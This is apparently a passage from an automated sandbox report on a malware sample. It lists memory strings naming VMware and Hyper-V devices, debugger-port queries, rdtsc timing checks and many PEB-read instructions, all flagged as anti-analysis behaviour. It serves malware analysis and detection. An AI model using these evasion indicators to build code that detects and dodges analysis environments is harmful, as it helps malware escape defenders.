Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000002.2942465733.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000009.00000002.2946201505.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AD0 NtReadFile,LdrInitializeThunk, 8_2_00FB2AD0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C0F0 mov eax, dword ptr fs:[00000030h] 8_2_00F6C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB20F0 mov ecx, dword ptr fs:[00000030h] 8_2_00FB20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A0E3 mov ecx, dword ptr fs:[00000030h] 8_2_00F6A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01030115 mov eax, dword ptr fs:[00000030h] 8_2_01030115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov ecx, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F780E9 mov eax, dword ptr fs:[00000030h] 8_2_00F780E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF60E0 mov eax, dword ptr fs:[00000030h] 8_2_00FF60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF20DE mov eax, dword ptr fs:[00000030h] 8_2_00FF20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov ecx, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F680A0 mov eax, dword ptr fs:[00000030h] 8_2_00F680A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01008158 mov eax, dword ptr fs:[00000030h] 8_2_01008158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044164 mov eax, dword ptr fs:[00000030h] 8_2_01044164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044164 mov eax, dword ptr fs:[00000030h] 8_2_01044164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7208A mov eax, dword ptr fs:[00000030h] 8_2_00F7208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014180 mov eax, dword ptr fs:[00000030h] 8_2_01014180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014180 mov eax, dword ptr fs:[00000030h] 8_2_01014180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h] 8_2_0102C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h] 8_2_0102C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9C073 mov eax, dword ptr fs:[00000030h] 8_2_00F9C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72050 mov eax, dword ptr fs:[00000030h] 8_2_00F72050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6050 mov eax, dword ptr fs:[00000030h] 8_2_00FF6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h] 8_2_010361C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h] 8_2_010361C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A020 mov eax, dword ptr fs:[00000030h] 8_2_00F6A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C020 mov eax, dword ptr fs:[00000030h] 8_2_00F6C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010461E5 mov eax, dword ptr fs:[00000030h] 8_2_010461E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF4000 mov ecx, dword ptr fs:[00000030h] 8_2_00FF4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA01F8 mov eax, dword ptr fs:[00000030h] 8_2_00FA01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h] 8_2_00F861D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h] 8_2_00F861D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov ecx, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006030 mov eax, dword ptr fs:[00000030h] 8_2_01006030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h] 8_2_00F6A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h] 8_2_00F6A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h] 8_2_00F6A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB0185 mov eax, dword ptr fs:[00000030h] 8_2_00FB0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C156 mov eax, dword ptr fs:[00000030h] 8_2_00F6C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h] 8_2_00F76154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h] 8_2_00F76154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010080A8 mov eax, dword ptr fs:[00000030h] 8_2_010080A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72140 mov ecx, dword ptr fs:[00000030h] 8_2_00F72140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72140 mov eax, dword ptr fs:[00000030h] 8_2_00F72140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010360B8 mov eax, dword ptr fs:[00000030h] 8_2_010360B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010360B8 mov ecx, dword ptr fs:[00000030h] 8_2_010360B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0124 mov eax, dword ptr fs:[00000030h] 8_2_00FA0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h] 8_2_00F802E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h] 8_2_00F802E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h] 8_2_00F802E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov eax, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov ecx, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov eax, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov eax, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104634F mov eax, dword ptr fs:[00000030h] 8_2_0104634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A352 mov eax, dword ptr fs:[00000030h] 8_2_0103A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01018350 mov ecx, dword ptr fs:[00000030h] 8_2_01018350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h] 8_2_00F802A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h] 8_2_00F802A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h] 8_2_00FF0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h] 8_2_00FF0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h] 8_2_00FF0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101437C mov eax, dword ptr fs:[00000030h] 8_2_0101437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h] 8_2_00FAE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h] 8_2_00FAE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h] 8_2_00F74260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h] 8_2_00F74260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h] 8_2_00F74260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6826B mov eax, dword ptr fs:[00000030h] 8_2_00F6826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A250 mov eax, dword ptr fs:[00000030h] 8_2_00F6A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76259 mov eax, dword ptr fs:[00000030h] 8_2_00F76259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF8243 mov eax, dword ptr fs:[00000030h] 8_2_00FF8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF8243 mov ecx, dword ptr fs:[00000030h] 8_2_00FF8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6823B mov eax, dword ptr fs:[00000030h] 8_2_00F6823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102C3CD mov eax, dword ptr fs:[00000030h] 8_2_0102C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h] 8_2_010143D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h] 8_2_010143D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov ecx, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80218 mov eax, dword ptr fs:[00000030h] 8_2_00F80218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA63FF mov eax, dword ptr fs:[00000030h] 8_2_00FA63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF63C0 mov eax, dword ptr fs:[00000030h] 8_2_00FF63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h] 8_2_0102A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h] 8_2_0102A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104625D mov eax, dword ptr fs:[00000030h] 8_2_0104625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h] 8_2_00F68397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h] 8_2_00F68397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h] 8_2_00F68397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
